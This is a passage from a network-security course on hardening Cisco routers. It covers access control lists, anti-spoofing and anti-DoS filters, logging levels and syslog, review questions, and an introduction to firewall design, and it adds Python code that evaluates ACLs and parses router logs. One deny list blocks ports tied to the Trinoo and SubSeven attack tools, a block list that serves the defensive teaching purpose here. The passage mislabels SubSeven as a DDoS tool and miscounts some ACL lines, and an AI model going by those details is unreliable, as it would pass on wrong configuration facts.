Our fourth example will be limiting the permission of given hosts to telnet to the Internet and the denial of a network telnetting to the Internet. This can be accomplished by using an extended ACL, due to the need to control access to individual ports. The configuration fragment for this example is:
Router#configure terminal
Router(config)#access-list 123 permit tcp 192.168.20.16 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit tcp 192.168.10.7 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 deny tcp 192.168.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 out
Router(config-if)#^Z
Router#
The third line is permitting all traffic not denied by the second line. The word any can be used in place of 0.0.0.0 255.255.255.255. The fourth line is permitting all traffic not denied by the second and third lines. For the fifth line, permit ip any any could be used to shorten the syntax.
Granting FTP to a Subnet
Our fifth example will be granting one subnet the ability to ftp to the Internet, while denying the other subnet. Again, this can be accomplished by an extended ACL, due to the need to control access to individual ports. The configuration fragment for this example is:
Router#configure terminal
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 145 out
Router(config-if)#^Z
Router#
Defending Against Attacks with ACLs
ACLs can be used for much more than simply granting or denying access to a service or utility. They can be used to guard against known attacks on the network, such as SYN and DoS attacks. This is due to the fact that many tools use known and identifiable patterns in their attacks.
Anti-DoS ACLs
These ACLs work by recognizing the protocol and port selection of the DoS attack. It is possible that by using these ACLs, you may block legitimate applications that have chosen the same high port values, so that must be taken into account. In order to prevent hosts inside the network from participating in a DoS on an Internet host, you should consider placing these on all interfaces, in both directions. At the minimum, you will place these lists on the inbound interfaces that are connected to the Internet.
In the configuration fragment that follows, the first section (ports 27665, 31335, 27444) of the list is designed to block the TRINOO DDoS, and the second section (ports 6776, 6669, 2222, 7000) is designed to block the SubSeven DDoS.
Router(config)#access-list 160 deny tcp any any eq 27665
Router(config)#access-list 160 deny udp any any eq 31335
Router(config)#access-list 160 deny udp any any eq 27444
Router(config)#access-list 160 deny tcp any any eq 6776
Router(config)#access-list 160 deny tcp any any eq 6669
Router(config)#access-list 160 deny tcp any any eq 2222
Router(config)#access-list 160 deny tcp any any eq 7000
Anti-SYN ACLs
The TCP SYN attack is where the attacker floods the target host and prevents any legitimate connections from being made to the target host. To work on blocking this, the ACL must allow legitimate TCP connections, which are created by hosts inside the network, but disallow connections to those hosts from outside (like on the Internet).
In this first configuration fragment, traffic that is established internally is allowed out, and incoming connections are not able to create new sessions.
Router#configure terminal
Router(config)#access-list 170 permit tcp any 192.168.20.0 0.0.0.255 established
Router(config)#access-list 170 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 170 in
Router(config-if)#^Z
Router#
Anti-Land ACLs
Another type of attack that has been around for some time is the Land attack. The Land attack is rather simple in design, but it can cause serious network damage to unprotected systems. The attack works by sending a packet from an IP address to the same IP address, and using the same ports. So, a packet would be sent from 10.10.10.10:5700 to 10.10.10.10:5700 causing a significant slowdown or DoS of the target.
The following configuration fragment shows the defense against a Land attack on host 10.20.30.50, which is an IP address of an external interface on the router.
Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip address 10.20.30.50 255.255.255.0
Router(config-if)#exit
Router(config)#
Router(config)#access-list 110 deny ip host 10.20.30.50 host 10.20.30.50 log
Router(config)#access-list 110 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 110 in
Router(config-if)#^Z
Router#
Anti-spoofing ACLs
Spoofing of packets has become more commonplace due to the increased number of tools that provide this function. You can use your router to combat this issue by not allowing packets to enter the network if they are coming from an internal IP address.
When you create these lists, you want them to be complete. In other words, do not forget to block the broadcast addresses (to prevent attacks like the Smurf attack), the network addresses themselves, and private or reserved addresses. In the following configuration fragment, the internal network is 152.148.10.0/24, and you will see that there are quite a few lines necessary to provide for full spoof protection:
Router#configure terminal
Router(config)#access-list 130 deny ip 152.148.10.0 0.0.0.255 any
Router(config)#access-list 130 deny ip 127.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 0.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 10.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 172.16.0.0 0.15.255.255 any
Router(config)#access-list 130 deny ip 192.168.0.0 0.0.255.255 any
Router(config)#access-list 130 deny ip host 255.255.255.255 any
Router(config)#access-list 130 permit ip any 152.148.10.0 0.0.0.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 130 in
Router(config-if)#^Z
Router#
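To see how these lists actually treat packets, here is an added Python evaluator (not from the book) that parses standard and extended access-list statements with Cisco wildcard semantics, the host and any shorthands, eq ports and established, applies first-match with the implicit deny, and flags statements shadowed by an earlier catch-all. The sample lists are taken from this topic, with the 172.16/12 and 0/8 anti-spoofing entries written as the wildcards 0.15.255.255 and 0.255.255.255; the Telnet, anti-SYN and anti-spoofing lists and any packet addresses are constructed test input.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample lists from this topic: Telnet list 123, anti-SYN list 170 and the
# anti-spoofing list 130 (172.16/12 and 0/8 written as wildcards 0.15.255.255, 0.255.255.255).
TELNET_ACL = """
access-list 123 permit tcp 192.168.20.16 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
access-list 123 permit tcp 192.168.10.7 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
access-list 123 deny tcp 192.168.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 23
access-list 123 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255
"""
ANTI_SYN_ACL = """
access-list 170 permit tcp any 192.168.20.0 0.0.0.255 established
access-list 170 deny ip any any
"""
ANTI_SPOOF_ACL = """
access-list 130 deny ip 152.148.10.0 0.0.0.255 any
access-list 130 deny ip 127.0.0.0 0.255.255.255 any
access-list 130 deny ip 0.0.0.0 0.255.255.255 any
access-list 130 deny ip 10.0.0.0 0.255.255.255 any
access-list 130 deny ip 172.16.0.0 0.15.255.255 any
access-list 130 deny ip 192.168.0.0 0.0.255.255 any
access-list 130 deny ip host 255.255.255.255 any
access-list 130 permit ip any 152.148.10.0 0.0.0.255
"""
Addr = Tuple[str, str]                       # (base address, wildcard mask)
ANY: Addr = ("0.0.0.0", "255.255.255.255")   # every bit is "don't care"

@dataclass
class Rule:
    action: str                   # permit or deny
    proto: str                    # ip, tcp, udp or icmp
    src: Addr
    dst: Addr
    dport: Optional[int] = None   # destination port from 'eq PORT'
    established: bool = False     # only TCP segments with ACK or RST set

def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """Cisco wildcard semantics: 0 bits must equal the base address, 1 bits are ignored."""
    care = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    return int(ipaddress.IPv4Address(addr)) & care == int(ipaddress.IPv4Address(base)) & care

def _addr(t: List[str], i: int) -> Tuple[Addr, int]:
    """Consume one address spec at t[i]: any | host A | A WILDCARD | bare A (mask omitted)."""
    if t[i] == "any":
        return ANY, i + 1
    if t[i] == "host":
        return (t[i + 1], "0.0.0.0"), i + 2
    if i + 1 < len(t) and t[i + 1] not in ("eq", "established", "log", "log-input"):
        return (t[i], t[i + 1]), i + 2
    return (t[i], "0.0.0.0"), i + 1

def parse_acl(text: str) -> List[Rule]:
    """Parse 'access-list N permit|deny ...' lines: standard (1-99) or extended (100-199)."""
    rules = []
    for line in text.strip().splitlines():
        t = line.split("#", 1)[-1].split()     # tolerate a 'Router(config)#' prompt
        if t[:1] != ["access-list"]:
            continue                           # e.g. 'configure terminal' or '^Z'
        number, action = int(t[1]), t[2]
        if 1 <= number <= 99:                  # standard list: source address only
            src, i = _addr(t, 3)
            rule = Rule(action, "ip", src, ANY)
        else:                                  # extended list: protocol, source, destination
            src, i = _addr(t, 4)
            dst, i = _addr(t, i)
            rule = Rule(action, t[3], src, dst)
        while i < len(t):                      # optional trailing keywords
            if t[i] == "eq":
                rule.dport, i = int(t[i + 1]), i + 2
            elif t[i] == "established":
                rule.established, i = True, i + 1
            elif t[i] in ("log", "log-input"):
                i += 1                         # logging does not change the match decision
            else:
                raise ValueError(f"unsupported keyword {t[i]!r}: {line}")
        rules.append(rule)
    return rules

def evaluate(rules: List[Rule], src: str, dst: str, proto: str = "ip",
             dport: Optional[int] = None, established: bool = False) -> str:
    """First matching rule wins; a packet matching nothing hits the implicit 'deny ip any any'."""
    for r in rules:
        if r.proto not in ("ip", proto) or (r.dport is not None and r.dport != dport):
            continue
        if r.established and not established:
            continue
        if wildcard_match(src, *r.src) and wildcard_match(dst, *r.dst):
            return r.action
    return "deny"

def shadowed_rules(rules: List[Rule]) -> List[int]:
    """Indexes of rules that can never match because an earlier 'ip any any' rule (no port,
    not established) catches every packet; note '0.0.0.0 255.255.255.255' also means any."""
    catch_all = [i for i, r in enumerate(rules) if r.proto == "ip" and r.src == ANY
                 and r.dst == ANY and r.dport is None and not r.established]
    return list(range(catch_all[0] + 1, len(rules))) if catch_all else []
```

Because parse_acl strips the prompt, a fragment can be pasted from this topic as written; running shadowed_rules on a list before applying it catches a deny whose source wildcard is 255.255.255.255, which would silently drop every packet including the permit that follows it.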
TASK 3E-1
Creating Access Control Lists
Setup: Use the network as diagrammed in Figure 3-16 for this task.
1. Create the configuration fragment that you would use to create an Access Control List to prevent a SYN attack coming from the Internet into the private networks.
Router#configure terminal
Router(config)#access-list 135 permit tcp any 192.168.20.0 0.0.0.255 established
Router(config)#access-list 135 permit tcp any 192.168.10.0 0.0.0.255 established
Router(config)#access-list 135 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 135 in
Router(config-if)#^Z
Router#
Context-based Access Control
Although a detailed discussion of Cisco's Context-based Access Control is out of the scope of this book, this feature is quite valuable, and worth some investigation. The Cisco Context-based Access Control function is part of the Cisco IOS Firewall Feature Set, and provides powerful options if your router is going to play a significant part in your firewall system.
Cisco Context-based Access Control (CBAC) works by filtering TCP, UDP, and in more recent revisions, ICMP network traffic. CBAC is able to inspect inside the packet looking at the actual application.
CBAC essentially works by creating a dynamic (temporary) connection in your
router, by keeping track of the state of your network traffic. For example, assume
you had an access control list that said no Telnet connections are to be accepted
inbound from the Internet to your router. With CBAC, you can build your system
to allow an inbound Telnet connection, IF the router recognizes that packet as the
return traffic of a session that was started by an authorized internal user.
When packets enter the router, they are first processed through the access control lists. If a packet is denied, it will not move on to the CBAC inspection. If the packet is allowed after running through the ACLs, then that packet will move on to CBAC inspection.
Topic 3F
Logging Concepts
Although it does not get the credit or generate a high level of interest, logging on the router is a critical aspect of router hardening. Logs enable you to investigate attacks, find problems in the network, and analyze the network.
When you are configuring the logging options on a router, just as logging elsewhere in the network, you must walk a fine line between gathering too much and too little information. Log too much, and you will have a difficult time finding that single piece of critical information you need to make a decision or to perform an action. Log too little, and you do not have enough information to make an informed decision or to take proper action.
There are many different kinds of logging applications and software products that can track and record logs from all over the network. These applications can then send messages to a pager or cell phone when significant events happen. In this section, you will look at just the options that the actual router can manage, without using any major third-party applications.
Cisco Logging Options
On a Cisco router, the device can log information using several different methods,
such as:
Console Logging: Log messages are sent to the console port directly.
Terminal Logging: Log messages are sent to the VTY sessions.
Buffered Logging: Log messages are kept in the RAM on the router. Once the buffer fills, the oldest messages are overwritten by newer messages.
Syslog Logging: Log messages can be sent to an external syslog server to
store and sort the messages there.
SNMP Logging: Log messages are sent (by using SNMP traps) to an SNMP
server on the network.
Note on CBAC (Topic 3E): since UDP communications do not establish a session, the CBAC system approximates the time (as defined by the administrator) a session should remain open.
Log Priority
The router has a built-in function of priority listing for log messages. The levels
range from 0 to 7. If a message is given a lower number, it is considered to be a
more critical message. So, Level 1 is more critical than Level 6.
When you select a level, that level and all others of a lower number will be
displayed. For example, if you select level 3, you will be presented with mes-
sages from level 3 to 0. If you select level 7, you will be presented with
messages from level 7 to 0.
The following table lists the level of logs, along with their titles and descriptions.
Level  Title          Description
0      Emergencies    System is (or is becoming) unusable.
1      Alerts         Immediate action is needed.
2      Critical       A critical condition has occurred.
3      Errors         An error condition has occurred.
4      Warnings       A warning condition has occurred.
5      Notifications  Normal, but noteworthy event.
6      Informational  Informative message.
7      Debugging      Debugging message.
The following table lists an example event for each level of severity.
Level  Example
0      The IOS was unable to initialize.
1      The core router temperature is too high.
2      A problem in assigning memory occurred.
3      The memory size allocated is invalid.
4      Cryptography operation is unable to complete.
5      An interface changed state to up or down. (This is a very common event.)
6      A packet has been denied by an Access Control List.
7      No event triggers this level; debug messages are displayed only when the debug option is used.
An example of what a log line will look like in the router is:
%SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)
In this line, the %SYS-5-CONFIG_I indicates that a Level 5 message was logged.
Following the colon is the message itself. In this case, the router had a configuration change made via a VTY session using IP address 172.16.10.1.
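As an added example (not part of the book), the following Python code parses lines of this %FACILITY-SEVERITY-MNEMONIC form, applies a configured level the way the router does (the selected level and every lower-numbered, more critical one, with the level given by name or, as on IOS 12.0 and newer, by number), and tallies the Level 6 ACL log entries by denied source. The log lines are constructed samples in the shape of IOS output with timestamps enabled; the message names are assumed for illustration.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional

# Level names as used by IOS logging commands; IOS 12.0 and newer also accept the number.
LEVELS = {"emergencies": 0, "alerts": 1, "critical": 2, "errors": 3,
          "warnings": 4, "notifications": 5, "informational": 6, "debugging": 7}

# %FACILITY-SEVERITY-MNEMONIC: text, optionally preceded by a 'service timestamps' prefix.
LOG_RE = re.compile(
    r"^(?:(?P<stamp>[^%]*?):\s*)?"
    r"%(?P<facility>[A-Z0-9_]+)-(?P<severity>[0-7])-(?P<mnemonic>[A-Z0-9_]+):\s*(?P<text>.*)$"
)

# Constructed sample buffer in the shape IOS produces with
# 'service timestamps log datetime msec localtime show-timezone' (message names assumed).
SAMPLE_LOG = """\
Mar  1 10:15:02.117 EST: %SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)
Mar  1 10:15:40.003 EST: %LINK-3-UPDOWN: Interface Serial0, changed state to down
Mar  1 10:15:45.219 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to up
Mar  1 10:16:01.550 EST: %SEC-6-IPACCESSLOGP: list 123 denied tcp 10.1.1.1(4242) -> 172.16.10.5(23), 1 packet
Mar  1 10:16:03.002 EST: %SEC-6-IPACCESSLOGP: list 123 denied tcp 10.1.1.1(4243) -> 172.16.10.5(23), 1 packet
Mar  1 10:16:09.876 EST: %SEC-6-IPACCESSLOGP: list 155 denied tcp 192.0.2.77(51002) -> 172.16.0.1(23), 1 packet
"""


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Split a log line into stamp, facility, severity (int), mnemonic and text; None if not a log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["severity"] = int(m.group("severity"))
    return rec


def level_number(level) -> int:
    """Resolve a level the way 'logging console LEVEL' does: by name, or (IOS 12.0+) by number."""
    text = str(level).strip().lower()
    n = int(text) if text.isdigit() else LEVELS[text]
    if not 0 <= n <= 7:
        raise ValueError(f"severity level must be 0-7, got {level!r}")
    return n


def filter_log(lines: Iterable[str], level) -> List[Dict[str, object]]:
    """Keep the selected level and every lower-numbered (more critical) one, as the router does."""
    limit = level_number(level)
    return [rec for rec in map(parse_line, lines) if rec and rec["severity"] <= limit]


def acl_denies_by_source(records: Iterable[Dict[str, object]]) -> Counter:
    """Count Level 6 ACL log entries per denied source address."""
    counts: Counter = Counter()
    for rec in records:
        if rec["facility"] == "SEC" and str(rec["mnemonic"]).startswith("IPACCESSLOG"):
            m = re.search(r"denied \w+ (\d+\.\d+\.\d+\.\d+)", str(rec["text"]))
            if m:
                counts[m.group(1)] += 1
    return counts
```

Filtering the sample at notifications (level 5), as the console example in this topic does, drops all three ACL entries, which is why a level of 6 is needed to see ACL logging at all.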
Configuring Logging
In the following examples, you will see how to configure different forms of logging. Some will use the buffer, others the console. Viewing the configuration fragments through this section will enable you to determine which type of logging you will use in given situations. On the Cisco router, the command to enable logging is entered in Global Configuration Mode, using the logging on command.
Timestamping
In order for you to properly analyze the logs, you will need to know what happened when, not just that something happened. The assignment of a time that an event occurred, or to timestamp, is an option in the router. The Cisco command to configure the timestamp option is service timestamps log datetime.
There are three options that can be added to this command.
The msec option will include the millisecond in a log entry. This may or may not be required, based on your goals. If not added, the log will round the event to the nearest full second.
The localtime option will make the router stamp the logs using the local time, so that it is easier for people to read and analyze the logs. When using a syslog server, this option is often left off.
The show-timezone option adds the time zone to the log message. This can be useful when working with log files from many locations and regions.
Console Logging
Console logging is perhaps the most straightforward of all of the logging options in the Cisco router. The following configuration fragment shows logging set to level 5 and to use the console as the method.
Router#configure terminal
Router(config)#logging on
Router(config)#logging console notifications
Router(config)#^Z
Router#
In this example, level 5 logging has been configured. This means that Level 6 items, such as access list log entries, will not be logged, nor will any debug messages. Had the goal been to see only those log messages that are level 2 or more critical, the proper command would have been logging console critical.
Buffered Logging
Buffered logging requires you to define the memory size that will be used for the logs. The general formula that many follow is that if the router has less than 16 MB of RAM, your log can be 16 kilobytes. If your router has more than 16 MB of RAM, then your log can go as high as 32 or even 64 KB.
On all logs, the time and date can be added to the messages, which is a recommended procedure. On buffered logging, however, it goes from a recommended to a required procedure. This is due to the fact that the router discards old messages and replaces them with new messages, when the buffer space is filled. So, the time of the log is a critical component to buffered logging. The following configuration fragment shows logging set to level 2, and using a timestamp.
When you are configuring logging in IOS 11.3 and earlier versions, the command must include the name of the level, such as Alerts. In IOS 12.0 and newer versions, you can use either the name of the level or the number of the level.
Router#configure terminal
Router(config)#logging on
Router(config)#logging buffered 16000 critical
Router(config)#service timestamps log datetime msec localtime show-timezone
Router(config)#^Z
Router#
In this example, the amount of memory that has been allocated is 16 KB. The
logs will go to the buffer and will be recorded if they are level 2 (Critical) or
higher. Finally, full timestamping is used, including the local time and the time
zone options.
Terminal Logging
Normally, there are no messages sent to terminal sessions. This is for bandwidth purposes and, in some situations, security purposes. In order to allow logging to be visible on a VTY session, the terminal monitor command must be used. The following configuration fragment shows logging set to level 5, and to be sent to the VTY sessions.
Router#configure terminal
Router(config)#logging on
Router(config)#logging monitor 5
Router(config)#^Z
Router#terminal monitor
Router#
In this example, the terminal session will receive all level 5 and more critical (lower-numbered) messages. This is the first example that uses the numeric value of the level instead of the name, an indicator that the router must be at least IOS version 12.0. There is a second part for terminal logging. The above fragment will tell the router to log messages to the VTY sessions, but the VTY sessions have not been configured to see the messages. The terminal monitor command enables the VTY session to actually view the messages on screen. In the event that the logs become too numerous or are no longer needed, the terminal no monitor command can be used to stop viewing the logs on the VTY session.
Syslog Logging
Cisco routers have the ability to send their log messages to a server that is running as a syslog server. This is a highly recommended method of logging in a production environment. Routers collect the log messages, just as they normally do. However, instead of showing them on the console, or storing them in memory, they are sent to a server that will manage the messages and store them to the server's hard drive.
This will allow for long-term storage and analysis of the information and will not be subject to real time analysis or memory constraints. Most UNIX and Linux servers have some version of the syslog server function, and there are many syslog applications for Windows systems on the market.
To configure syslog logging on a Cisco router, there are four components:
The destination host is any host that can be located using a host name, DNS name, or an IP address.
The syslog facility is the name to use to configure the storage of the messages on the syslog server. Although there are quite a few facility names, the routers will use the ones named Local0 through Local7.
The severity level of the logs can be viewed as similar to that of the other log messages, using the Cisco severity levels.
The source interface for the messages is the actual network interface that will send the messages to the Syslog server.
The following configuration fragment shows the setup of a router to use a syslog server.
Router#configure terminal
Router(config)#logging on
Router(config)#logging trap 5
Router(config)#logging host 10.20.30.45
Router(config)#logging facility Local5
Router(config)#logging origin-id hostname
Router(config)#logging source-interface Ethernet 0
Router(config)#^Z
Router#
In this example, logging has been enabled. Logging is going to be sent to a
syslog server, logging messages that are level 5 or more critical. The IP address
of the syslog server is 10.20.30.45. (Additional servers can be used with multiple
commands using different IP addresses here, for redundancy.) The facility on the
syslog server is Local5, the origin-id is the hostname (Router in this example),
and the source for these messages is Ethernet 0 on the router.
TASK 3F-1
Configuring Buffered Logging
1. Create the configuration fragment you would use for buffered logging, using 32 kilobytes of memory. Include all timestamping options and log level 4 events. Assume that the router is running IOS version 12.2.
Router#configure terminal
Router(config)#logging on
Router(config)#logging buffered 32000 4
Router(config)#service timestamps log datetime msec localtime show-timezone
Router(config)#^Z
Router#
ACL Logging
The previous section on logging focused on the system log events, critical errors, and messages. Another important area to investigate is the use of logging in relationship to your Access Control Lists. When implemented, ACL logs are listed as Level 6 events.
In order to implement ACL logging, the commands are very simple. All you need to add is the keyword log or log-input to the end of the ACL statements.
You do not want to add this line to all your ACL statements, however, or you will flood your logs with so much information that you will be virtually unable to identify anything useful.
Use of the log keyword will list the type, date, and time in the ACL log, and is a valid option only for standard ACLs on IOS version 12.0 and newer. The log-input keyword adds information on the interface and source MAC address, and an example of the use of this is if the same ACL is to be applied to more than one interface.
Logging may be one reason that you do not count on the default deny all rule of an ACL. If a packet is dropped due to the default deny all statement, that packet will not be logged. If, however, you add the following line as your last statement in the ACL, then packets will be logged: access-list 123 deny ip any any log.
Anti-spoofing Logging
Earlier, you looked at the creation of anti-spoofing ACLs. In this section, you will see these ACLs used with the logging function to gather information for analysis. In these examples, assume that the internal network is 172.16.0.0/16. First, the configuration fragment of the list itself:
Router#configure terminal
Router(config)#access-list 123 deny ip 172.16.0.0 0.0.255.255 any log-input
Router(config)#access-list 123 permit ip any any
Router(config)#access-list 145 permit ip 172.16.0.0 0.0.255.255 any log-input
Router(config)#access-list 145 deny ip any any log-input
Router(config)#^Z
Router#
For the next example, assume that the router has one internal Ethernet interface (where the trusted network is located) and has two external serial interfaces. The following configuration fragment shows the application of the ACLs, first list 123 then list 145, on their proper interfaces.
Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)#ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)#ip access-group 145 out
Router(config-if)#^Z
Router#
VTY Logging
When gaining access to the router, a primary method used was through VTY sessions. These sessions may come under frequent attacks at larger organizations. You will want to know who is and who is not successful at gaining access via VTY sessions; again, logging is the answer to that need.
In this example, you will again assume the internal network 172.16.0.0/16, and that there is only one trusted host that has authorized VTY access, 172.16.23.45. With those variables defined, the following is the configuration fragment that will log VTY sessions on the router.
Router#configure terminal
Router(config)#access-list 155 permit ip host 172.16.23.45 any log-input
Router(config)#access-list 155 deny ip any any log-input
Router(config)#^Z
Router#
Once you have created the list, as shown, you will need to apply the list. In the following configuration fragment, the list is applied to VTY sessions 0 through 4.
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#access-class 155 in
Router(config-line)#^Z
Router#
TASK 3F-2
Configuring Anti-spoofing Logging
1. Create a logged ACL that is used for anti-spoofing, using the following information: The router has interfaces Ethernet0, Serial0, and Serial1. Ethernet0 is connected to the only trusted network, which has the IP address 192.168.45.0/24. For this exercise, and in the interest of time, only create anti-spoofing for the defined network. If you want to expand this to include all private and reserved networks, you can do so, but it is not required.
Router#configure terminal
Router(config)#access-list 160 deny ip 192.168.45.0 0.0.0.255 any log-input
Router(config)#access-list 160 permit ip any any
Router(config)#access-list 170 permit ip 192.168.45.0 0.0.0.255 any log-input
Router(config)#access-list 170 deny ip any any log-input
Router(config)#^Z
Router#
Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)#ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)#ip access-group 170 out
Router(config-if)#^Z
Router#
Summary
In this lesson, you examined the fundamentals of router security and the principles of routing. You created the configurations that are required to harden a Cisco router and configured the removal of services and protocols. You examined the process of the wildcard mask and how it relates to the Cisco ACL. You created the configurations for ACLs to defend the network against attacks. Finally, you examined the process of logging on a Cisco router and configured buffered and anti-spoofing logging.
Lesson Review
3A What is authentication?
Authentication is the process of identifying a user, generally granting or
denying access.
What is authorization?
Authorization is the process of dening what a user can do, or is authorized
to do.
What is AAA?
Authentication, Authorization, and Accounting.
What are the methods of access to a Cisco router?
Console port
Auxiliary port
VTY sessions
HTTP
TFTP
SNMP
3B List some of the advantages of using static routing.
Responses might include:
Precise control over the routes that data will take across the network.
Easy to configure in small networks.
Reduced bandwidth use, due to no excessive router traffic.
Reduced load on the routers, due to no need to make complex routing
calculations.
What is a security advantage to using RIPv2 over RIPv1?
Using RIPv2 provides the security advantage of authentication, enabling the
routers to identify who is and who is not able to update routing information.
3C What is a security reason for disabling CDP?
CDP might be broadcasting information about the router that is not intended
to be public knowledge.
What is an attack that you can defend against by disabling ICMP
directed broadcasts?
Smurf.
3D What type of Access Control List allows for the checking of port num-
bers?
Extended ACLs allow for port checking.
When a packet enters the router, what is the first thing the router will check regarding that packet?
Is there a route for this packet? If yes, send to the ACLs if there are any; if
no, discard the packet (and respond to the sender if need be).
3E What is the syntax for a standard Access Control List?
Router(config)#access-list access-list-number {permit|deny} source [source-mask]
What is the syntax for an extended Access Control List?
Router(config)#access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator|operand]
What is the syntax for implementation of a standard Access Control
List?
Router(config-if)#ip access-group access-list-number {in|out}
3F When a configuration change is made to the router, such as an interface being brought down, what level of message will this generate?
Level 5.
What is the command for an access list to be implemented on the VTY
sessions?
access-class [access list number] in
Lesson 4: Designing Firewalls
Overview
In this lesson, you will be introduced to the concepts and technologies used in designing firewall systems. You will identify the methods of implementing firewalls in different scenarios, using different technologies. The strategies and concepts in this lesson are important in understanding later lessons.
Objectives
To identify the design and implementation issues of firewall systems, you will:
4A Examine the principles of firewall design and implementation.
Given a firewall system, you will identify and describe methodologies of firewall function and implementation.
4B Create a firewall policy based on provided statements.
Given the answers to questions regarding the firewall, you will create a firewall policy statement.
4C Create a rule set to be used with a packet filter.
Given a network scenario, you will create a rule set for a packet filtering firewall.
4D Describe the function of a proxy server.
Given a network scenario, you will describe the process of internal clients
using a proxy server to access Internet web pages.
4E Describe how a bastion host is included in the security of a network.
Given a network scenario, you will describe how the creation of a bastion
host functions in the security of the network.
4F Describe the function of a honeypot in a network environment.
Given a network running Windows 2003, describe the function of an
effective honeypot in the security of the network.
Data Files
none
Lesson Time
2 hours
LESSON 4
Lesson 4: Designing Firewalls 155
Topic 4A
Firewall Components
The concept of Network Security today is a varied and challenging topic to discuss. There are so many different areas of the network architecture to be concerned with, ranging from messaging systems to databases, from file and print solutions to remote network access. In between these areas of our network, we find things such as access control solutions, user control policies (group policies in a Windows environment), and a host of settings, functionality and options that serve to confuse and confound the average user of a computer in a domain-based network today.
It was not that long ago that security and the protection of network-based assets was clearly the domain of the network engineer, that person who was technically savvy, highly skilled, and oftentimes hard to talk to and understand if you were not also a network engineer.
The challenges faced by these network engineers (access control, asset protection, and risk mitigation) have not changed at all, and yet at the same time, the technology used to address these issues has undergone startling transformations in both complexity and capability. One need only look at the advances in the area of the firewall to see all too clearly how this transformation has had a direct, undeniable, and profound impact both on network security and on users' perceptions of that security and of the people who provide it.
The following image is an example of a simple firewall.
Figure 4-1: An example of a single firewall.
The firewall itself is positioned logically between the internal network (the LAN) and the external network (the WAN). The firewall sits there performing its job, denying and granting access based on rules that the network/security administrator has created and assigned to the device.
Over the last few years, providing this option to simply grant or deny access has typically been enough to provide a basic level of security and protection to most, if not all, of our networks. The challenge that has been steadily rising in relation to the provision of basic security has been that the hackers and the enemies of the networks that are protected by firewalls have not been content to sit back and quit trying to figure out how to break the security afforded by the firewalls.
As a result, the addition of new features and options for the firewall has become a very important part of the continuing evolution of network security overall, and of the ability to protect our networks from unauthorized and unwanted network access and traffic in particular.
In addition to denying and granting access, a firewall may now offer one or more of the following services:
Network Address Translation (NAT): NAT is used by the router to translate internal private IP addresses to external IP addresses.
Data Caching: This option allows the router to store data that is accessed often by network clients.
Restriction on Content: This option is available in many newer systems, allowing the administrator to control Internet access based on keyword restrictions.
Firewall Methodologies
Firewalls have two general methods of implementing security within a network. Although there are variations of these two, most modifications still boil down to one or the other. They are:
Packet filtering
Proxy servers (application gateway)
Packet filtering was the first type of firewall used by many organizations to protect their networks. The general method of implementing a packet filter was to use a router. These routers had the ability to either permit or deny packets, based on simple rules the administrator would create.
Even though these firewalls could perform this type of filtering, they were limited by the fact that they were designed to look at the header information of the packet only. An example of this drawback would be that a filter could block FTP access but could not block only a PUT command in FTP.
The addition of proxy server (also known as application gateway) capabilities to the firewalls created a much more solid security product than a pure packet filter was capable of providing on its own. The proxy software can make decisions based on more than the header of a packet.
Proxy servers use software to intercept network traffic that is destined for a given application. The proxy recognizes the request and, on behalf of the client, makes the request to the server. In this case, the internal client never makes a direct connection to the external server. Instead of a direct connection, the proxy functions as the man-in-the-middle and speaks to both the client and the server, relaying their messages back and forth.
The major advantage to this is that the proxy software can be instructed to permit or deny traffic based upon the actual data in the packet, not simply the header. In other words, the proxy is aware of communication methods, and will respond accordingly, not just open and close a port in a given direction.
What a Firewall Cannot Do
So if a firewall can use packet filtering, proxy services, a combination of both, or custom filtering to create secure environments for our data, the logical question that we have to ask is: what can't a firewall do to protect the network? All too often a network/security administrator is told to go and buy a firewall to secure the network.
